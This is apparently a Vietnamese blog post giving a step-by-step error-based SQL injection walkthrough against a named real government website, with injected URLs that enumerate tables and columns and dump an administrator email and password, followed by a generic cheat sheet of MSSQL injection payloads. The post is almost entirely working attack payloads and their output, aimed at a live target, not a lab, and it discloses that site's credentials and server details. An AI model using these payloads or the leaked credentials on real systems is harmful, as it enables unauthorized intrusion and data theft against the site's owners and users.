check loi = '
loi hien thi
Unclosed quotation mark after the character string ''?
=>> sqli
Bu?c 2: Truy v?n tên các table
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
xuat hien table thu 1 = 'Advert'
Conversion failed when converting the nvarchar value 'Advert' to data type int
Ti?p t?c truy v?n:
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Advert')))-- -
xuat hien Nick
Conversion failed when converting the nvarchar value 'Nick' to data type int.
tip tuc
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Advert','Nick')))-- -
xuat hien 'Cate'
Conversion failed when converting the nvarchar value 'Cate' to data type int.
tip tuc cho toi khi thay khi thay table Users == table chua thong tin can
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Advert','Nick','Cate','News','Site','CateManager','Users')))-- -
Bu?c 3 : Truy v?n tên các columns
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('Users') ))-- -
tip tuc khai thac
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('Users') and column_name not in ('ID','Email','PassWord','Active','own')))-- -
buoc 4 show thong tin mun lay o day la email va pass
thong tin mail
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 Email from Users))-- -
adminduytien
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 PassWord from Users))-- -
duytien123
show cung luc 2 thong tin su dung %2b'/'%2b =>/
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 Email%2b'/'%2bPassWord from Users))-- -
Bu?c 5: Tìm link admin và dang nhâp
tu xu :v
K?t Lu?n Các Query SQLI Trong Aspx C?n Luu Ý
1- Get the version:
and 1=convert(int,@@version)-- -?
Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)
Jul 9 2008 14:17:44
Copyright (c) 1988-2008 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' to data type int.
2- Get Server Name
and 1=convert(int,@@servername)-- -?
Conversion failed when converting the nvarchar value 'WIN-1VBUV10IB3G' to data type int.
3- Get data base name:
and 1=convert(int,db_name())-- -?
Conversion failed when converting the nvarchar value 'duytien_data' to data type int.
4- Get system user
and 1=convert(int,system_user) -- -?
Conversion failed when converting the nvarchar value 'duytien_user' to data type int.
5- Get table th? nh?t
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -?
6- Get table th? 2:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -?
7- Get table th? 3 :
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -?
8- Get d?n table user d? l?y thông tin dang nh?p c?a admin
10 - Get column th? nh?t t? table ch?a admin :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -?
11- Get column th? nh?t t? table ch?a admin :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")?
and column_name not in ("FIRST-COLUMNS-HERE")))-- -
12- Get cho h?t các columns c?n l?y thông tin
13- Xu?t ra thông tin username và password
and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -?
tét bình luận :D
ReplyDelete